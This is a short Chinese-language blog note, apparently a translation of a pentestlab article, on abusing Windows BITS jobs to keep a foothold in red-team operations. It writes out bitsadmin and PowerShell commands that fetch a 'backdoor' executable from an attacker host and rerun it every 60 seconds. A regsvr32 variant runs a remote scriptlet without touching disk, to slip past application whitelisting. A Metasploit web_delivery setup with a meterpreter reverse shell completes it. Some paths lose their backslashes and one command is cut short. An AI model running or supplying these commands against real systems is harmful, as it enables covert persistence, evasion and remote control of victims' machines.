Window許可權維持之BITS Jobs利用
- 2019 年 12 月 9 日
- 筆記
0x00:簡介
Windows作業系統包含各種實用程式,系統管理員可以使用它們來執行各種任務。這些實用程式之一是後台智慧傳輸服務(BITS),它可以促進文件到Web伺服器(HTTP)和共享文件夾(SMB)的傳輸能力。Microsoft提供了一個名為「 bitsadmin 」 的二進位文件和PowerShell cmdlet,用於創建和管理文件傳輸。
0x01:過程
從攻擊的角度來看,可以濫用此功能,以便在受感染的主機上下載有效負載(可執行文件,PowerShell腳本,Scriptlet等)並在給定時間執行這些文件,以在紅色團隊操作中保持持久性。但是,與「 bitsadmin 」 進行交互需要管理員級別的許可權。執行以下命令會將惡意有效負載從遠程位置下載到本地目錄。
bitsadmin /transfer backdoor /download /priority high http://10.0.2.21/pentestlab.exe C:tmppentestlab.exe
Bitsadmin –文件傳輸
還有一個PowerShell cmdlet可以執行相同的任務。
Start-BitsTransfer -Source "http://10.0.2.21/pentestlab.exe
BitsTrasfer –傳輸文件PowerShell
將文件放入磁碟後,可以通過從「 bitsadmin 」實用程式執行以下命令來實現持久性。用法非常簡單:
1、在創建參數需要作業的名稱
2、該addfile需要文件的遠程位置和本地路徑
3、該SetNotifyCmdLine將執行的命令
4、所述SetMinRetryDelay定義時間回調(秒)
5、該簡歷參數將運行位工作。
bitsadmin /create backdoor bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe" "C:tmppentestlab.exe" bitsadmin /SetNotifyCmdLine backdoor C:tmppentestlab.exe NUL bitsadmin /SetMinRetryDelay "backdoor" 60 bitsadmin /resume backdoor
持久性—BITS Jobs
當作業在系統上運行時,有效負載將被執行,Meterpreter會話將打開,或者通訊將被接收回命令和控制(取決於場合中使用的C2)。
持久性– BITS Jobs Meterpreter
參數SetNotifyCmdLine也可以用於通過regsvr32實用程式從遠程位置執行scriptlet 。這種方法的好處是它不會接觸磁碟,並且可以避開將應用程式列入白名單的產品。
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.0.2.21:8080/FHXSd9.sct scrobj.dll" bitsadmin /resume backdoor
BITS Jobs – Regsvr32
Metasploit框架可用於通過Web交付模組捕獲有效負載。
use exploit/multi/script/web_delivery set target 3 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.0.2.21 exploit
0x02:來源
文章翻譯至
https://pentestlab.blog/2019/10/30/persistence-bits-jobs/